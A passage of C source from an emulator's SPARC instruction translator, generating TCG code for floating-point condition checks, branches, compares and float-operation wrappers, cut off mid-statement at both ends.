{ TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); tcg_temp_free(tcg_ctx, t0); } // 3: FCC0 & FCC1 static inline void gen_op_eval_fbu(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_and_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 0: !(FCC0 | FCC1) static inline void gen_op_eval_fbe(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // 0 or 3: !(FCC0 ^ FCC1) static inline void gen_op_eval_fbue(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // 0 or 2: !FCC0 static inline void gen_op_eval_fbge(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !1: !(FCC0 & !FCC1) static inline void gen_op_eval_fbuge(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // 0 or 1: !FCC1 static inline void gen_op_eval_fble(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC1(tcg_ctx, dst, src, fcc_offset); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !2: !(!FCC0 & FCC1) static inline void gen_op_eval_fbule(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // !3: !(FCC0 & FCC1) static inline void gen_op_eval_fbo(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_and_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } static inline void gen_branch2(DisasContext *dc, target_ulong pc1, target_ulong pc2, TCGv r_cond) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, r_cond, 0, l1); gen_goto_tb(dc, 0, pc1, pc1 + 4); gen_set_label(tcg_ctx, l1); gen_goto_tb(dc, 1, pc2, pc2 + 4); } static void gen_branch_a(DisasContext *dc, target_ulong pc1) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); target_ulong npc = dc->npc; tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_cond, 0, l1); gen_goto_tb(dc, 0, npc, pc1); gen_set_label(tcg_ctx, l1); gen_goto_tb(dc, 1, npc + 4, npc + 8); dc->base.is_jmp = DISAS_NORETURN; } static void gen_branch_n(DisasContext *dc, target_ulong pc1) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; target_ulong npc = dc->npc; if (likely(npc != DYNAMIC_PC)) { dc->pc = npc; dc->jump_pc[0] = pc1; dc->jump_pc[1] = npc + 4; dc->npc = JUMP_PC; } else { TCGv t, z; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_npc, tcg_ctx->cpu_npc, 4); t = tcg_const_tl(tcg_ctx, pc1); z = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_npc, tcg_ctx->cpu_cond, z, t, tcg_ctx->cpu_npc); tcg_temp_free(tcg_ctx, t); tcg_temp_free(tcg_ctx, z); dc->pc = DYNAMIC_PC; } } static inline void gen_generic_branch(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv npc0 = tcg_const_tl(tcg_ctx, dc->jump_pc[0]); TCGv npc1 = tcg_const_tl(tcg_ctx, dc->jump_pc[1]); TCGv zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_npc, tcg_ctx->cpu_cond, zero, npc0, npc1); tcg_temp_free(tcg_ctx, npc0); tcg_temp_free(tcg_ctx, npc1); tcg_temp_free(tcg_ctx, zero); } /* call this function before using the condition register as it may have been set for a jump */ static inline void flush_cond(DisasContext *dc) { if (dc->npc == JUMP_PC) { gen_generic_branch(dc); dc->npc = DYNAMIC_PC; } } static inline void save_npc(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->npc == JUMP_PC) { gen_generic_branch(dc); dc->npc = DYNAMIC_PC; } else if (dc->npc != DYNAMIC_PC) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_npc, dc->npc); } } static inline void update_psr(DisasContext *dc) { if (dc->cc_op != CC_OP_FLAGS) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; dc->cc_op = CC_OP_FLAGS; gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); } } static inline void save_state(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dc->pc); save_npc(dc); } static void gen_exception(DisasContext *dc, int which) { TCGv_i32 t; TCGContext *tcg_ctx = dc->uc->tcg_ctx; save_state(dc); t = tcg_const_i32(tcg_ctx, which); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); dc->base.is_jmp = DISAS_NORETURN; } static void gen_check_align(TCGContext *tcg_ctx, TCGv addr, int mask) { TCGv_i32 r_mask = tcg_const_i32(tcg_ctx, mask); gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, addr, r_mask); tcg_temp_free_i32(tcg_ctx, r_mask); } static inline void gen_mov_pc_npc(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->npc == JUMP_PC) { gen_generic_branch(dc); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); dc->pc = DYNAMIC_PC; } else if (dc->npc == DYNAMIC_PC) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); dc->pc = DYNAMIC_PC; } else { dc->pc = dc->npc; } } static inline void gen_op_next_insn(TCGContext *tcg_ctx) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_npc, tcg_ctx->cpu_npc, 4); } static void free_compare(TCGContext *tcg_ctx, DisasCompare *cmp) { if (!cmp->g1) { tcg_temp_free(tcg_ctx, cmp->c1); } if (!cmp->g2) { tcg_temp_free(tcg_ctx, cmp->c2); } } static void gen_compare(DisasCompare *cmp, bool xcc, unsigned int cond, DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; static int subcc_cond[16] = { TCG_COND_NEVER, TCG_COND_EQ, TCG_COND_LE, TCG_COND_LT, TCG_COND_LEU, TCG_COND_LTU, -1, /* neg */ -1, /* overflow */ TCG_COND_ALWAYS, TCG_COND_NE, TCG_COND_GT, TCG_COND_GE, TCG_COND_GTU, TCG_COND_GEU, -1, /* pos */ -1, /* no overflow */ }; static int logic_cond[16] = { TCG_COND_NEVER, TCG_COND_EQ, /* eq: Z */ TCG_COND_LE, /* le: Z | (N ^ V) -> Z | N */ TCG_COND_LT, /* lt: N ^ V -> N */ TCG_COND_EQ, /* leu: C | Z -> Z */ TCG_COND_NEVER, /* ltu: C -> 0 */ TCG_COND_LT, /* neg: N */ TCG_COND_NEVER, /* vs: V -> 0 */ TCG_COND_ALWAYS, TCG_COND_NE, /* ne: !Z */ TCG_COND_GT, /* gt: !(Z | (N ^ V)) -> !(Z | N) */ TCG_COND_GE, /* ge: !(N ^ V) -> !N */ TCG_COND_NE, /* gtu: !(C | Z) -> !Z */ TCG_COND_ALWAYS, /* geu: !C -> 1 */ TCG_COND_GE, /* pos: !N */ TCG_COND_ALWAYS, /* vc: !V -> 1 */ }; TCGv_i32 r_src; TCGv r_dst; #ifdef TARGET_SPARC64 if (xcc) { r_src = tcg_ctx->cpu_xcc; } else { r_src = tcg_ctx->cpu_psr; } #else r_src = tcg_ctx->cpu_psr; #endif switch (dc->cc_op) { case CC_OP_LOGIC: cmp->cond = logic_cond[cond]; do_compare_dst_0: cmp->is_bool = false; cmp->g2 = false; cmp->c2 = tcg_const_tl(tcg_ctx, 0); #ifdef TARGET_SPARC64 if (!xcc) { cmp->g1 = false; cmp->c1 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, tcg_ctx->cpu_cc_dst); break; } #endif cmp->g1 = true; cmp->c1 = tcg_ctx->cpu_cc_dst; break; case CC_OP_SUB: switch (cond) { case 6: /* neg */ case 14: /* pos */ cmp->cond = (cond == 6 ? TCG_COND_LT : TCG_COND_GE); goto do_compare_dst_0; case 7: /* overflow */ case 15: /* !overflow */ goto do_dynamic; default: cmp->cond = subcc_cond[cond]; cmp->is_bool = false; #ifdef TARGET_SPARC64 if (!xcc) { /* Note that sign-extension works for unsigned compares as long as both operands are sign-extended. */ cmp->g1 = cmp->g2 = false; cmp->c1 = tcg_temp_new(tcg_ctx); cmp->c2 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, tcg_ctx->cpu_cc_src); tcg_gen_ext32s_tl(tcg_ctx, cmp->c2, tcg_ctx->cpu_cc_src2); break; } #endif cmp->g1 = cmp->g2 = true; cmp->c1 = tcg_ctx->cpu_cc_src; cmp->c2 = tcg_ctx->cpu_cc_src2; break; } break; default: do_dynamic: gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); dc->cc_op = CC_OP_FLAGS; /* FALLTHRU */ case CC_OP_FLAGS: /* We're going to generate a boolean result. */ cmp->cond = TCG_COND_NE; cmp->is_bool = true; cmp->g1 = cmp->g2 = false; cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); cmp->c2 = tcg_const_tl(tcg_ctx, 0); switch (cond) { case 0x0: gen_op_eval_bn(tcg_ctx, r_dst); break; case 0x1: gen_op_eval_be(tcg_ctx, r_dst, r_src); break; case 0x2: gen_op_eval_ble(tcg_ctx, r_dst, r_src); break; case 0x3: gen_op_eval_bl(tcg_ctx, r_dst, r_src); break; case 0x4: gen_op_eval_bleu(tcg_ctx, r_dst, r_src); break; case 0x5: gen_op_eval_bcs(tcg_ctx, r_dst, r_src); break; case 0x6: gen_op_eval_bneg(tcg_ctx, r_dst, r_src); break; case 0x7: gen_op_eval_bvs(tcg_ctx, r_dst, r_src); break; case 0x8: gen_op_eval_ba(tcg_ctx, r_dst); break; case 0x9: gen_op_eval_bne(tcg_ctx, r_dst, r_src); break; case 0xa: gen_op_eval_bg(tcg_ctx, r_dst, r_src); break; case 0xb: gen_op_eval_bge(tcg_ctx, r_dst, r_src); break; case 0xc: gen_op_eval_bgu(tcg_ctx, r_dst, r_src); break; case 0xd: gen_op_eval_bcc(tcg_ctx, r_dst, r_src); break; case 0xe: gen_op_eval_bpos(tcg_ctx, r_dst, r_src); break; case 0xf: gen_op_eval_bvc(tcg_ctx, r_dst, r_src); break; } break; } } static void gen_fcompare(TCGContext *tcg_ctx, DisasCompare *cmp, unsigned int cc, unsigned int cond) { unsigned int offset; TCGv r_dst; /* For now we still generate a straight boolean result. */ cmp->cond = TCG_COND_NE; cmp->is_bool = true; cmp->g1 = cmp->g2 = false; cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); cmp->c2 = tcg_const_tl(tcg_ctx, 0); switch (cc) { default: case 0x0: offset = 0; break; case 0x1: offset = 32 - 10; break; case 0x2: offset = 34 - 10; break; case 0x3: offset = 36 - 10; break; } switch (cond) { case 0x0: gen_op_eval_bn(tcg_ctx, r_dst); break; case 0x1: gen_op_eval_fbne(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x2: gen_op_eval_fblg(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x3: gen_op_eval_fbul(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x4: gen_op_eval_fbl(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x5: gen_op_eval_fbug(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x6: gen_op_eval_fbg(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x7: gen_op_eval_fbu(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x8: gen_op_eval_ba(tcg_ctx, r_dst); break; case 0x9: gen_op_eval_fbe(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xa: gen_op_eval_fbue(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xb: gen_op_eval_fbge(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xc: gen_op_eval_fbuge(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xd: gen_op_eval_fble(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xe: gen_op_eval_fbule(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xf: gen_op_eval_fbo(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; } } static void gen_cond(TCGv r_dst, unsigned int cc, unsigned int cond, DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasCompare cmp; gen_compare(&cmp, cc, cond, dc); /* The interface is to return a boolean in r_dst. */ if (cmp.is_bool) { tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); } else { tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); } free_compare(tcg_ctx, &cmp); } static void gen_fcond(TCGContext *tcg_ctx, TCGv r_dst, unsigned int cc, unsigned int cond) { DisasCompare cmp; gen_fcompare(tcg_ctx, &cmp, cc, cond); /* The interface is to return a boolean in r_dst. */ if (cmp.is_bool) { tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); } else { tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); } free_compare(tcg_ctx, &cmp); } #ifdef TARGET_SPARC64 // Inverted logic static const int gen_tcg_cond_reg[8] = { -1, TCG_COND_NE, TCG_COND_GT, TCG_COND_GE, -1, TCG_COND_EQ, TCG_COND_LE, TCG_COND_LT, }; static void gen_compare_reg(TCGContext *tcg_ctx, DisasCompare *cmp, int cond, TCGv r_src) { cmp->cond = tcg_invert_cond(gen_tcg_cond_reg[cond]); cmp->is_bool = false; cmp->g1 = true; cmp->g2 = false; cmp->c1 = r_src; cmp->c2 = tcg_const_tl(tcg_ctx, 0); } static inline void gen_cond_reg(TCGContext *tcg_ctx, TCGv r_dst, int cond, TCGv r_src) { DisasCompare cmp; gen_compare_reg(tcg_ctx, &cmp, cond, r_src); /* The interface is to return a boolean in r_dst. */ tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); free_compare(tcg_ctx, &cmp); } #endif static void do_branch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); target_ulong target = dc->pc + offset; #ifdef TARGET_SPARC64 if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } #endif if (cond == 0x0) { /* unconditional not taken */ if (a) { dc->pc = dc->npc + 4; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = dc->pc + 4; } } else if (cond == 0x8) { /* unconditional taken */ if (a) { dc->pc = target; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = target; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); } } else { flush_cond(dc); gen_cond(tcg_ctx->cpu_cond, cc, cond, dc); if (a) { gen_branch_a(dc, target); } else { gen_branch_n(dc, target); } } } static void do_fbranch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); target_ulong target = dc->pc + offset; #ifdef TARGET_SPARC64 if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } #endif if (cond == 0x0) { /* unconditional not taken */ if (a) { dc->pc = dc->npc + 4; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = dc->pc + 4; } } else if (cond == 0x8) { /* unconditional taken */ if (a) { dc->pc = target; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = target; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); } } else { flush_cond(dc); gen_fcond(tcg_ctx, tcg_ctx->cpu_cond, cc, cond); if (a) { gen_branch_a(dc, target); } else { gen_branch_n(dc, target); } } } #ifdef TARGET_SPARC64 static void do_branch_reg(DisasContext *dc, int32_t offset, uint32_t insn, TCGv r_reg) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int cond = GET_FIELD_SP(insn, 25, 27), a = (insn & (1 << 29)); target_ulong target = dc->pc + offset; if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } flush_cond(dc); gen_cond_reg(tcg_ctx, tcg_ctx->cpu_cond, cond, r_reg); if (a) { gen_branch_a(dc, target); } else { gen_branch_n(dc, target); } } static inline void gen_op_fcmps(TCGContext *tcg_ctx, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) { switch (fccno) { case 0: gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmps_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmps_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmps_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmpd(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { switch (fccno) { case 0: gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmpd_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmpd_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmpd_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmpq(TCGContext *tcg_ctx, int fccno) { switch (fccno) { case 0: gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 1: gen_helper_fcmpq_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 2: gen_helper_fcmpq_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 3: gen_helper_fcmpq_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; } } static inline void gen_op_fcmpes(TCGContext *tcg_ctx, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) { switch (fccno) { case 0: gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmpes_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmpes_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmpes_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmped(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { switch (fccno) { case 0: gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmped_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmped_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmped_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmpeq(TCGContext *tcg_ctx, int fccno) { switch (fccno) { case 0: gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 1: gen_helper_fcmpeq_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 2: gen_helper_fcmpeq_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 3: gen_helper_fcmpeq_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; } } #else static inline void gen_op_fcmps(TCGContext *tcg_ctx, int fccno, TCGv r_rs1, TCGv r_rs2) { gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmpd(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmpq(TCGContext *tcg_ctx, int fccno) { gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); } static inline void gen_op_fcmpes(TCGContext *tcg_ctx, int fccno, TCGv r_rs1, TCGv r_rs2) { gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmped(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmpeq(TCGContext *tcg_ctx, int fccno) { gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); } #endif static void gen_op_fpexception_im(DisasContext *dc, int fsr_flags) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_fsr, FSR_FTT_NMASK); tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_fsr, fsr_flags); gen_exception(dc, TT_FP_EXCP); } static int gen_trap_ifnofpu(DisasContext *dc) { if (!dc->fpu_enabled) { gen_exception(dc, TT_NFPU_INSN); return 1; } return 0; } static inline void gen_op_clear_ieee_excp_and_FTT(TCGContext *tcg_ctx) { tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_fsr, FSR_FTT_CEXC_NMASK); } static inline void gen_fop_FF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } static inline void gen_ne_fop_FF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, src); gen_store_fpr_F(dc, rd, dst); } static inline void gen_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src1, src2; src1 = gen_load_fpr_F(dc, rs1); src2 = gen_load_fpr_F(dc, rs2); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *,TCGv_i32, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src1, src2; src1 = gen_load_fpr_F(dc, rs1); src2 = gen_load_fpr_F(dc, rs2); dst = gen_dest_fpr_F(dc); gen(tcg_ctx,dst, src1, src2); gen_store_fpr_F(dc, rd, dst); } #endif static inline void gen_fop_DD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src; src = gen_load_fpr_D(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_DD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src; src = gen_load_fpr_D(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, src); gen_store_fpr_D(dc, rd, dst); } #endif static inline void gen_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, src1, src2); gen_store_fpr_D(dc, rd, dst); } static inline void gen_gsr_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src1, src2; src1 = 